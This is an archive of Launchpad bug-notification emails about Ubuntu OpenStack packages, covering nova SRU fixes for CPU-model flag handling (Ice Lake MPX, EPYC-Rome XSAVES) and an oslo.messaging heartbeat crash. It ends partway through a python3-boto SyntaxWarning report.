The package will build now and be available at https://launchpad.net/ubuntu/+source/nova/3:25.2.1-0ubuntu2.7 in a few hours, and then in the -proposed repository. Please help us by testing this new package. See https://wiki.ubuntu.com/Testing/EnableProposed for documentation on how to enable and use -proposed. Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, what testing has been performed on the package and change the tag from verification-needed-jammy to verification-done-jammy. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-failed-jammy. In either case, without details of your testing we will not be able to proceed. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance for helping!

N.B. The updated package will be released to -updates after the bug(s) fixed by this package have been verified and the package has been in -proposed for a minimum of 7 days.

** Changed in: nova (Ubuntu Jammy)
   Status: In Progress => Fix Committed

** Tags added: verification-needed verification-needed-jammy

** Changed in: nova (Ubuntu Focal)
   Status: In Progress => Fix Committed

** Tags added: verification-needed-focal

-- 
You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to nova in Ubuntu.
https://bugs.launchpad.net/bugs/1999814

Title:
  [SRU] Allow for specifying common baseline CPU model with disabled feature

Status in OpenStack Compute (nova): Expired
Status in OpenStack Compute (nova) ussuri series: New
Status in OpenStack Compute (nova) victoria series: Won't Fix
Status in OpenStack Compute (nova) wallaby series: Won't Fix
Status in OpenStack Compute (nova) xena series: Won't Fix
Status in OpenStack Compute (nova) yoga series: New
Status in nova package in Ubuntu: Fix Released
Status in nova source package in Bionic: Won't Fix
Status in nova source package in Focal: Fix Committed
Status in nova source package in Jammy: Fix Committed

Bug description:

******** SRU TEMPLATE AT THE BOTTOM *******

Hello,

This is very similar to pad.lv/1852437 (and the related blueprint at https://blueprints.launchpad.net/nova/+spec/allow-disabling-cpu-flags), but there is a very different and important nuance.

A customer I'm working with has two classes of blades that they're trying to use. Their existing ones are Cascade Lake-based; they are presently using the Cascadelake-Server-noTSX CPU model via libvirt.cpu_model in nova.conf. Their new blades are Ice Lake-based, a newer processor that would typically also be able to run with the Cascade Lake feature set - except that these Ice Lake processors lack the MPX feature defined in the Cascadelake-Server-noTSX model. The result of this is evident when I try to start nova on the new blades with the Ice Lake CPUs.
Even if I specify the following in my nova.conf:

[libvirt]
cpu_mode = custom
cpu_model = Cascadelake-Server-noTSX
cpu_model_extra_flags = -mpx

That is not enough to allow Nova to start; it fails in the libvirt driver in the _check_cpu_compatibility function:

2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Traceback (most recent call last):
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service   File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 771, in _check_cpu_compatibility
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service     self._compare_cpu(cpu, self._get_cpu_info(), None)
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service   File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 8817, in _compare_cpu
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service     raise exception.InvalidCPUInfo(reason=m % {'ret': ret, 'u': u})
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service nova.exception.InvalidCPUInfo: Unacceptable CPU info: CPU doesn't have compatibility.
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 0
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Refer to http://libvirt.org/html/libvirt-libvirt-host.html#virCPUCompareResult
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service During handling of the above exception, another exception occurred:
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Traceback (most recent call last):
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service   File "/usr/lib/python3/dist-packages/oslo_service/service.py", line 810, in run_service
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service     service.start()
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service   File "/usr/lib/python3/dist-packages/nova/service.py", line 173, in start
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service     self.manager.init_host()
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service   File "/usr/lib/python3/dist-packages/nova/compute/manager.py", line 1404, in init_host
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service     self.driver.init_host(host=self.host)
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service   File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 743, in init_host
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service     self._check_cpu_compatibility()
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service   File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 777, in _check_cpu_compatibility
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service     raise exception.InvalidCPUInfo(msg)
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service nova.exception.InvalidCPUInfo: Configured CPU model: Cascadelake-Server-noTSX is not compatible with
host CPU. Please correct your config and try again. Unacceptable CPU info: CPU doesn't have compatibility.
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 0
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Refer to http://libvirt.org/html/libvirt-libvirt-host.html#virCPUCompareResult
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service

If I make a custom libvirt CPU map file which removes the "mpx" feature and specify that as the cpu_model instead, I am able to make Nova start - so it does indeed seem to specifically be that single feature which is blocking me. However, editing the libvirt CPU mapping files is probably not the right way to fix this - hence why I'm filing this bug, for discussion of how to support cases like this.

Currently the only "proper" way I'm aware of to work around this is to fall back to a Broadwell-based configuration, which lacks the "mpx" feature, to use as a common baseline - but that's a much older configuration than Cascade Lake and would mean missing out on all the other features which are common to both Cascade Lake and Ice Lake. I would rather have a way to use the Cascade Lake settings but simply remove that "mpx" feature from use.

----

Steps to reproduce
==================

On an Ice Lake system lacking the MPX feature (e.g. /proc/cpuinfo reporting a model of "Intel(R) Xeon(R) Gold 5318Y"), specify the following settings in the libvirt section of nova.conf:

[libvirt]
cpu_mode = custom
cpu_model = Cascadelake-Server-noTSX
cpu_model_extra_flags = -mpx

Then try to start nova.

Expected result
===============

Nova should start, since Cascadelake-Server-noTSX is a subset of Icelake-Server-noTSX, thus allowing the use of Cascadelake-Server-noTSX as a common baseline model for both Cascade Lake and Ice Lake servers.
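The expected result above rests on a set relationship: the configured model's required features, minus any flags disabled via cpu_model_extra_flags, must be a subset of what the host provides. A rough sketch of that check (the feature sets here are heavily abbreviated and illustrative - the real libvirt CPU maps define dozens of flags per model, and this is not nova's or libvirt's actual comparison code):

```python
# Illustrative, abbreviated feature sets; real CPU maps are much larger.
CPU_MODELS = {
    "Cascadelake-Server-noTSX": {"sse4.2", "avx512f", "pku", "mpx"},
    "Icelake-Server-noTSX":     {"sse4.2", "avx512f", "pku", "gfni"},
}

def baseline_ok(host_model, cpu_model, extra_flags=()):
    """Return True if cpu_model, after applying '-flag' removals and
    '+flag' additions from extra_flags, only requires features that
    the host model provides."""
    required = set(CPU_MODELS[cpu_model])
    for flag in extra_flags:
        if flag.startswith("-"):
            required.discard(flag[1:])   # disabled flag: no longer required
        else:
            required.add(flag.lstrip("+"))
    return required <= CPU_MODELS[host_model]
```

Under these assumptions, `baseline_ok("Icelake-Server-noTSX", "Cascadelake-Server-noTSX")` fails only because of "mpx", and passes once the flag is disabled with `["-mpx"]` - which is exactly the behavior the reporter expected from `cpu_model_extra_flags = -mpx`.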
Actual result
=============

Nova refuses to start, claiming the specified CPU model is incompatible. The "cpu_model_extra_flags = -mpx" config option does not help.

Environment
===========

Nova/OpenStack version: OpenStack Ussuri running on Ubuntu Focal. Specifically, nova packages are at version 2:21.2.4-0ubuntu2.
Hypervisor: libvirt + KVM

Other relevant notes
====================

There are some other open related bugs. The removal of the MPX feature in some Ice Lake processors has manifested in other ways as well. These bugs are primarily about the missing MPX feature breaking how Ice Lake processors are detected, so the nuance is somewhat different - however, they may be worth reviewing as well.

* https://gitlab.com/libvirt/libvirt/-/issues/304: bug regarding the Icelake CPU maps in libvirt failing to detect certain Ice Lakes, instead detecting them as Broadwell-noTSX-IBRS according to "virsh capabilities" due to the missing MPX feature. (I've personally tested that removing the mpx feature from the associated CPU mapping files allows detection as Ice Lake, but that's not the correct way to fix this.) There is also an interesting comment on this bug at https://gitlab.com/libvirt/libvirt/-/issues/304#note_1065798706. It implies that rather than "virsh capabilities", "virsh domcapabilities" should be used instead, as it seems to more correctly identify the CPU model even when there are disabled flags like MPX.

* https://bugs.launchpad.net/ubuntu/+source/libvirt/+bug/1978064: Launchpad-side bug regarding the above issue as encountered in Ubuntu.

===============
SRU Description
===============

[Impact]

When using IceLake CPUs alongside CascadeLake CPUs, nova does not start because of the CPU model comparison; it fails before even comparing the flags. Unfortunately, IceLake CPUs are detected as compatible with Broadwell, not CascadeLake, and using Broadwell as a common denominator disables many modern features.
The Libvirt upstream team will not add specific support for IceLake [1]. The fix [2] in Nova is to skip the CPU check (as a configurable workaround) and let libvirt handle the added/removed flags, which is assumed to work for this specific case.

[Test case]

Because we do not have Icelake and Cascadelake CPUs in our usual lab for testing this specific scenario, the test case could be either:

1) running the charmed-openstack-tester [1] against the environment containing the upgraded package (essentially as it would be in a point release SRU) and expecting the test to pass. Test run evidence will be attached to LP.

2) manually deploying nova and the necessary openstack services to get Nova to the code point that validates the issue on a single node. I already achieved this and was able to test the fix by hacking the node code to bypass the need for other services (conductor, keystone, mysql, etc.), but for a proper validation a clean installation (without any hackery) is considered mandatory. In that case, the test case would be:

a) Deploy nova and required services on an IceLake machine.

b) Make sure nova.conf has:

cpu_mode = custom
cpu_models = Cascadelake-Server-noTSX
cpu_model_extra_flags = -mpx

c) Check /var/log/nova/nova-compute.log for a successful nova-compute service boot. It will not start properly without the fix, instead presenting the error:

2024-07-08 15:08:48.378 8399 CRITICAL nova [-] Unhandled error: nova.exception.InvalidCPUInfo: Configured CPU model: Cascadelake-Server-noTSX is not compatible with host CPU. Please correct your config and try again. Unacceptable CPU info: CPU doesn't have compatibility.

d) Install the package containing the fix and confirm a successful nova-compute service restart, no longer containing the error and containing this instead:

2024-07-09 19:41:31.806 243487 DEBUG nova.virt.libvirt.driver [-] cpu compare xml: Cascadelake-Server-noTSX

[Regression Potential]

There is 1 new behavior introduced and 1 changed.
The behavior introduced is gated by a new config option that needs to be enabled; when enabled, it skips running the check. The behavior changed is the one assumed by the default (disabled) value of the config option. The code being backported to Yoga through Ussuri is exactly the same as in current master (Caracal+), meaning no issues have been found with it across 4 releases, giving some confidence that the change is unlikely to cause issues.

[Other Info]

[1] https://bugs.launchpad.net/ubuntu/+source/libvirt/+bug/1978064
[2] https://review.opendev.org/c/openstack/nova/+/871969

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1999814/+subscriptions

From 1999814 at bugs.launchpad.net Thu Aug 1 20:14:46 2024
From: 1999814 at bugs.launchpad.net (Andreas Hasenack)
Date: Thu, 01 Aug 2024 20:14:46 -0000
Subject: [Bug 1999814] Please test proposed package
References: <167112824615.38411.17486317442666564453.malonedeb@angus.canonical.com>
Message-ID: <172254328614.1313926.13760160277923427554.malone@juju-98d295-prod-launchpad-7>

Hello Paul, or anyone else affected,

Accepted nova into focal-proposed. The package will build now and be available at https://launchpad.net/ubuntu/+source/nova/2:21.2.4-0ubuntu2.12 in a few hours, and then in the -proposed repository. Please help us by testing this new package. See https://wiki.ubuntu.com/Testing/EnableProposed for documentation on how to enable and use -proposed. Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, what testing has been performed on the package and change the tag from verification-needed-focal to verification-done-focal.
In either case, without details of your testing we will not be able to proceed. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance for helping!

N.B. The updated package will be released to -updates after the bug(s) fixed by this package have been verified and the package has been in -proposed for a minimum of 7 days.

-- 
You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to nova in Ubuntu.
https://bugs.launchpad.net/bugs/1999814

Title:
  [SRU] Allow for specifying common baseline CPU model with disabled feature

Status in OpenStack Compute (nova): Expired
Status in OpenStack Compute (nova) ussuri series: New
Status in OpenStack Compute (nova) victoria series: Won't Fix
Status in OpenStack Compute (nova) wallaby series: Won't Fix
Status in OpenStack Compute (nova) xena series: Won't Fix
Status in OpenStack Compute (nova) yoga series: New
Status in nova package in Ubuntu: Fix Released
Status in nova source package in Bionic: Won't Fix
Status in nova source package in Focal: Fix Committed
Status in nova source package in Jammy: Fix Committed

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1999814/+subscriptions

From 2048517 at bugs.launchpad.net Thu Aug 1 20:15:54 2024
From: 2048517 at bugs.launchpad.net (Andreas Hasenack)
Date: Thu, 01 Aug 2024 20:15:54 -0000
Subject: [Bug 2048517] Re: EPYC-Rome model without XSAVES may break live migration since the removal of the flag on the physical CPU
References: <170470935000.2322881.14682222740716386457.malonedeb@juju-98d295-prod-launchpad-4>
Message-ID: <172254335409.1315743.15589704572824582906.malone@juju-98d295-prod-launchpad-7>

Hello Jan, or anyone else affected,

Accepted nova into focal-proposed. The package will build now and be available at https://launchpad.net/ubuntu/+source/nova/2:21.2.4-0ubuntu2.12 in a few hours, and then in the -proposed repository. Please help us by testing this new package. See https://wiki.ubuntu.com/Testing/EnableProposed for documentation on how to enable and use -proposed. Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, what testing has been performed on the package and change the tag from verification-needed-focal to verification-done-focal.
If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-failed-focal. In either case, without details of your testing we will not be able to proceed. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance for helping!

N.B. The updated package will be released to -updates after the bug(s) fixed by this package have been verified and the package has been in -proposed for a minimum of 7 days.

** Changed in: nova (Ubuntu Focal)
   Status: In Progress => Fix Committed

** Tags added: verification-needed verification-needed-focal

-- 
You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to nova in Ubuntu.
https://bugs.launchpad.net/bugs/2048517

Title:
  EPYC-Rome model without XSAVES may break live migration since the removal of the flag on the physical CPU

Status in nova package in Ubuntu: Fix Released
Status in qemu package in Ubuntu: Invalid
Status in nova source package in Focal: Fix Committed
Status in qemu source package in Focal: Invalid

Bug description:

[ Impact ]

* Live migration is increasingly being impacted by changes to CPU flags (e.g., 'xsaves' disabled on AMD EPYC; PKRU/'xsave' behavior changes), which prevents migration between otherwise identical hypervisors whose only difference is a CPU flag (i.e., the source hypervisor still has the flag enabled; the destination hypervisor had the flag disabled by a kernel update).

* These CPU flag updates require changes to CPU model definitions in several places (qemu, libvirt, and nova if openstack is being used), which is a lot of overhead for each subtle variation that may appear.

* Fortunately, it's possible to reduce the changes required by allowing nova to customize CPU flags to enable/disable _on top_ of a CPU model definition (e.g., the same AMD EPYC CPU model with 'xsaves' disabled).
* This change is present in Jammy and later, and is backward compatible with existing config files, as the (new) enable/disable operators are an optional prefix to existing flags (e.g., '-xsaves' or '+xsaves').

[ Test Plan ]

* Deploy Openstack with 2 hypervisors (or more), and configure nova.conf with a cpu_model and cpu_model_extra_flags to disable/enable, for example:

  # grep cpu_model /etc/nova/nova.conf
  cpu_model = EPYC-Rome
  cpu_model_extra_flags = -xsaves

* Start a VM before/after the package upgrade (focal-proposed), checking the VM XML for that flag (e.g., policy change from require to disable); for example:

  Before: # virsh dumpxml instance- | grep xsaves
  After: # virsh dumpxml instance- | grep xsaves

* Ensure that nova is able to start *with* and *without* enable/disable cpu flag changes.

* Ensure live migration works both ways across the 2 hypervisors *with* and *without* enable/disable cpu flag changes.

[ Regression Potential ]

* Regressions would likely manifest in the areas modified by the patches, i.e., parsing the config file's cpu flags (on nova startup), generating a VM's XML file (on nova VM start/creation), and also live migration.

* The patched packages have been evaluated/running in production for 2-3 months now, and live migration has been performed without any issues.

[ Other Info ]

* The code changes had their callee-paths reviewed, and potential issues were not identified.

* The patches are already present in Jammy and later.

[ Original Bug Description ]

The linux kernel upstream disabled XSAVES on AMD EPYC Rome CPUs ([1]). Upstream qemu shortly followed with a patch adding a CPU model version of EPYC-Rome without XSAVES ([2]). The change in the kernel has been backported to ubuntu focal ([3]).
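The backward-compatible '+'/'-' prefix behavior described in the [ Impact ] section above - a '-' prefix disables a flag, a '+' prefix or no prefix at all enables it - can be sketched as follows. This is an illustration of the parsing rule only, not nova's actual cpu_model_extra_flags implementation:

```python
def parse_extra_flags(flags):
    """Split cpu_model_extra_flags entries into (enable, disable) sets.

    A '-' prefix disables a flag; a '+' prefix, or no prefix at all
    (for backward compatibility with pre-existing configs), enables it.
    """
    enable, disable = set(), set()
    for flag in flags:
        flag = flag.strip().lower()
        if flag.startswith("-"):
            disable.add(flag[1:])
        elif flag.startswith("+"):
            enable.add(flag[1:])
        elif flag:
            enable.add(flag)
    return enable, disable
```

For example, the test plan's `cpu_model_extra_flags = -xsaves` yields an empty enable set and `{"xsaves"}` in the disable set, which is what turns the flag's policy from "require" to "disable" in the generated VM XML.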
Without further workarounds or the adapted CPU model in qemu this will lead to a situation where virtual machines with an EPYC-Rome CPU model created on hypervisors with newer EPYC CPUs will have the XSAVES flag enabled, thus preventing live migration to hypervisors with EPYC Rome CPUs where XSAVES is no longer available. Therefore I would like to argue that the patch adapting the CPU model in qemu should also be backported to ubuntu focal. [1] https://lore.kernel.org/all/20230307174643.1240184-1-andrew.cooper3 at citrix.com/ [2] https://patchew.org/QEMU/20230524213748.8918-1-davydov-max at yandex-team.ru/ [3] https://bugs.launchpad.net/ubuntu/+source/linux/+bug/2023420 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/nova/+bug/2048517/+subscriptions From 1934937 at bugs.launchpad.net Thu Aug 1 20:35:00 2024 From: 1934937 at bugs.launchpad.net (Andreas Hasenack) Date: Thu, 01 Aug 2024 20:35:00 -0000 Subject: [Bug 1934937] Re: Heartbeat in pthreads in nova-wallaby crashes with greenlet error References: <162569043200.32143.8233415883389284315.malonedeb@wampee.canonical.com> Message-ID: <172254450149.889962.6080134065394584068.launchpad@juju-98d295-prod-launchpad-2> ** Also affects: python-oslo.messaging (Ubuntu) Importance: Undecided Status: New ** Changed in: python-oslo.messaging (Ubuntu) Status: New => Fix Released ** Changed in: python-oslo.messaging (Ubuntu Jammy) Status: New => In Progress -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. 
https://bugs.launchpad.net/bugs/1934937 Title: Heartbeat in pthreads in nova-wallaby crashes with greenlet error Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive yoga series: Triaged Status in oslo.messaging: Fix Released Status in nova package in Ubuntu: Invalid Status in python-oslo.messaging package in Ubuntu: Fix Released Status in nova source package in Jammy: Triaged Status in python-oslo.messaging source package in Jammy: In Progress Bug description: When performing a heartbeat to rabbit (inside a nova-compute process), there is a greenlet error which causes a hard crash. I'm not exactly sure what details are relevant, but can provide more info if there's something that will be useful! This is on RHEL7 (essentially... somewhat custom image based on it) Log snippet: ``` 2021-07-07 19:34:52,686 DEBUG [oslo.messaging._drivers.impl_rabbit] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/oslo_messaging/_drivers/impl_rabbit.py:__init__:608 [279fc413-9d7c-4fad-89e8-8de308658947] Connecting to AMQP server on 127.0.0.1:5671 2021-07-07 19:34:52,699 DEBUG [amqp.connection.Connection.heartbeat_tick] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:heartbeat_tick:726 heartbeat_tick : for connection 79f7cf4331b34cb0a2e3608281076773 2021-07-07 19:34:52,699 DEBUG [amqp.connection.Connection.heartbeat_tick] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:heartbeat_tick:740 heartbeat_tick : Prev sent/recv: None/None, now - 6/6, monotonic - 9634.717472491, last_heartbeat_sent - 9634.717470288, heartbeat int. 
- 60 for connection 79f7cf4331b34cb0a2e3608281076773 2021-07-07 19:34:52,700 DEBUG [amqp.connection.Connection.heartbeat_tick] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:heartbeat_tick:726 heartbeat_tick : for connection 79f7cf4331b34cb0a2e3608281076773 2021-07-07 19:34:52,701 DEBUG [amqp.connection.Connection.heartbeat_tick] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:heartbeat_tick:740 heartbeat_tick : Prev sent/recv: 6/6, now - 6/6, monotonic - 9634.719438155, last_heartbeat_sent - 9634.717470288, heartbeat int. - 60 for connection 79f7cf4331b34cb0a2e3608281076773 2021-07-07 19:34:52,718 DEBUG [amqp] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:_on_start:382 Start from server, version: 0.9, properties: {'capabilities': {'publisher_confirms': True, 'exchange_exchange_bindings': True, 'basic.nack': True, 'consumer_cancel_notify': True, 'connection.blocked': True, 'consumer_priorities': True, 'authentication_failure_close': True, 'per_consumer_qos': True, 'direct_reply_to': True}, 'cluster_name': 'rabbit_5672 at fedb460a.openstack', 'copyright': 'Copyright (c) 2007-2020 VMware, Inc. or its affiliates.', 'information': 'Licensed under the MPL 1.1. 
Website: https://rabbitmq.com', 'platform': 'Erlang/OTP 23.0.2', 'product': 'RabbitMQ', 'version': '3.8.5'}, mechanisms: [b'PLAIN', b'AMQPLAIN', b'EXTERNAL'], locales: ['en_US'] 2021-07-07 19:34:52,719 DEBUG [amqp] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/channel.py:__init__:104 using channel_id: 1 2021-07-07 19:34:52,720 DEBUG [amqp] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/channel.py:_on_open_ok:444 Channel open 2021-07-07 19:34:52,721 DEBUG [amqp.connection.Connection.heartbeat_tick] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:heartbeat_tick:726 heartbeat_tick : for connection c0299792d20e42a2b0a17d037d7d3058 Traceback (most recent call last): File "/opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/eventlet/hubs/hub.py", line 476, in fire_timers timer() File "/opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/eventlet/hubs/timer.py", line 59, in __call__ cb(*args, **kw) File "/opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/eventlet/semaphore.py", line 152, in _do_acquire waiter.switch() greenlet.error: cannot switch to a different thread ``` Versions: ``` oslo.messaging==12.7.1 nova==23.0.2 (packaged locally from stable/wallaby as of July 3, 2021) ``` ------------------------------------------------------------------------------- [Impact] The Nova default value of heartbeat_in_pthread needs to be False for non-wsgi services otherwise they crash when attempting to send a heartbeat message e.g. in a greenthread like nova-compute. This backports the patch to Jammy/Yoga in Ubuntu. 
[Test Plan] * Deploy Openstack Yoga on Jammy and ensure nova-compute has debug=True * ensure "oslo_messaging_rabbit.heartbeat_in_pthread = False" by checking latest entry in /var/log/nova/nova-compute.log * By default a heartbeat is checked 2 times every 60 seconds * Check /var/log/nova/nova-compute.log and ensure that you do not see any "greenlet.error: cannot switch to a different thread" errors [Regression Potential] Changing the default to False will mean that while services not running under wsgi will be fixed, services that are running under wsgi will revert to using their native threading method, i.e. greenthreads, which is considered suboptimal; in very loaded environments this could have a perceived impact on API performance. A separate bug https://bugs.launchpad.net/charm-nova-cloud-controller/+bug/2073260 has been opened to address this. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1934937/+subscriptions From 1934937 at bugs.launchpad.net Thu Aug 1 20:40:49 2024 From: 1934937 at bugs.launchpad.net (Andreas Hasenack) Date: Thu, 01 Aug 2024 20:40:49 -0000 Subject: [Bug 1934937] Re: Heartbeat in pthreads in nova-wallaby crashes with greenlet error References: <162569043200.32143.8233415883389284315.malonedeb@wampee.canonical.com> Message-ID: <172254485000.896343.16413171239277848984.malone@juju-98d295-prod-launchpad-2> So if we leave it as is, services under wsgi will keep working, but services NOT under wsgi will crash. If we make this change, services under wsgi will suffer a performance regression (to be confirmed?), and services NOT under wsgi will work. Is that the proposed tradeoff? I suppose this can't be figured out dynamically? Or is that what you intend to do in https://bugs.launchpad.net/charm-nova-cloud-controller/+bug/2073260? 
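The "figure it out dynamically" idea raised above could, in principle, key the default off whether the process is eventlet-monkeypatched. The following is a hypothetical Python sketch of that detection, not what oslo.messaging actually ships:

```python
def default_heartbeat_in_pthread():
    """Pick a runtime default for heartbeat_in_pthread.

    Hypothetical sketch only: a native-pthread heartbeat is assumed safe
    when the process is NOT eventlet-monkeypatched (i.e. wsgi servers).
    """
    try:
        from eventlet import patcher
    except ImportError:
        # No eventlet at all: a real pthread heartbeat is safe.
        return True
    # If 'thread' is monkey-patched, "threads" are greenlets pinned to
    # one OS thread; resuming them from a real pthread raises
    # "greenlet.error: cannot switch to a different thread".
    return not patcher.is_monkey_patched('thread')
```

One limitation of this approach is that it cannot see monkey-patching performed after oslo.messaging is imported, which is an argument for keeping a static config default instead.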
** Changed in: python-oslo.messaging (Ubuntu Jammy) Status: In Progress => Incomplete -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. https://bugs.launchpad.net/bugs/1934937 Title: Heartbeat in pthreads in nova-wallaby crashes with greenlet error Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive yoga series: Triaged Status in oslo.messaging: Fix Released Status in nova package in Ubuntu: Invalid Status in python-oslo.messaging package in Ubuntu: Fix Released Status in nova source package in Jammy: Triaged Status in python-oslo.messaging source package in Jammy: Incomplete To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1934937/+subscriptions From 1934937 at bugs.launchpad.net Thu Aug 1 20:42:17 2024 From: 1934937 at bugs.launchpad.net (Andreas Hasenack) Date: Thu, 01 Aug 2024 20:42:17 -0000 Subject: [Bug 1934937] Re: Heartbeat in pthreads in nova-wallaby crashes with greenlet error References: <162569043200.32143.8233415883389284315.malonedeb@wampee.canonical.com> Message-ID: <172254493751.1352172.979881623211742175.malone@juju-98d295-prod-launchpad-7> Does this still affect nova? -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. 
https://bugs.launchpad.net/bugs/1934937 Title: Heartbeat in pthreads in nova-wallaby crashes with greenlet error Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive yoga series: Triaged Status in oslo.messaging: Fix Released Status in nova package in Ubuntu: Invalid Status in python-oslo.messaging package in Ubuntu: Fix Released Status in nova source package in Jammy: Triaged Status in python-oslo.messaging source package in Jammy: Incomplete To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1934937/+subscriptions From 2075551 at bugs.launchpad.net Thu Aug 1 22:08:40 2024 From: 2075551 at bugs.launchpad.net (Eric Lopez) Date: Thu, 01 Aug 2024 22:08:40 -0000 Subject: [Bug 2075551] [NEW] SyntaxWarning messages on python3-boto install Message-ID: <172255012071.2213979.15478828004375885898.malonedeb@juju-98d295-prod-launchpad-4> Public bug reported: Description: Ubuntu 24.04 LTS Release: 24.04 apt-cache policy python3-boto python3-boto: Installed: 2.49.0-4.1 Candidate: 2.49.0-4.1 Version table: *** 2.49.0-4.1 500 500 http://us-east-1.ec2.archive.ubuntu.com/ubuntu noble/universe amd64 Packages 100 /var/lib/dpkg/status python3: Installed: 3.12.3-0ubuntu1 Candidate: 3.12.3-0ubuntu1 Version table: *** 3.12.3-0ubuntu1 500 500 http://us-east-1.ec2.archive.ubuntu.com/ubuntu noble/main amd64 Packages 100 /var/lib/dpkg/status Setting up python3-boto (2.49.0-4.1) ... 
/usr/lib/python3/dist-packages/boto/__init__.py:1105: SyntaxWarning: invalid escape sequence '\c' """ /usr/lib/python3/dist-packages/boto/cloudfront/distribution.py:512: SyntaxWarning: invalid escape sequence '\*' """ /usr/lib/python3/dist-packages/boto/cloudsearchdomain/layer1.py:79: SyntaxWarning: invalid escape sequence '\`' """ /usr/lib/python3/dist-packages/boto/connection.py:672: SyntaxWarning: invalid escape sequence '\w' '(?:(?P[\w\-\.]+):(?P.*)@)?' /usr/lib/python3/dist-packages/boto/connection.py:673: SyntaxWarning: invalid escape sequence '\w' '(?P[\w\-\.]+)' /usr/lib/python3/dist-packages/boto/connection.py:674: SyntaxWarning: invalid escape sequence '\d' '(?::(?P\d+))?' /usr/lib/python3/dist-packages/boto/gs/resumable_upload_handler.py:238: SyntaxWarning: invalid escape sequence '\d' m = re.search('bytes=(\d+)-(\d+)', range_spec) /usr/lib/python3/dist-packages/boto/https_connection.py:80: SyntaxWarning: invalid escape sequence '\.' host_re = host.replace('.', '\.').replace('*', '[^.]*') /usr/lib/python3/dist-packages/boto/opsworks/layer1.py:2640: SyntaxWarning: invalid escape sequence '\A' """ /usr/lib/python3/dist-packages/boto/pyami/config.py:98: SyntaxWarning: invalid escape sequence '\s' match = re.match("^#import[\s\t]*([^\s^\t]*)[\s\t]*$", line) /usr/lib/python3/dist-packages/boto/redshift/layer1.py:327: SyntaxWarning: invalid escape sequence '\,' """ /usr/lib/python3/dist-packages/boto/redshift/layer1.py:2164: SyntaxWarning: invalid escape sequence '\)' """ /usr/lib/python3/dist-packages/boto/redshift/layer1.py:2264: SyntaxWarning: 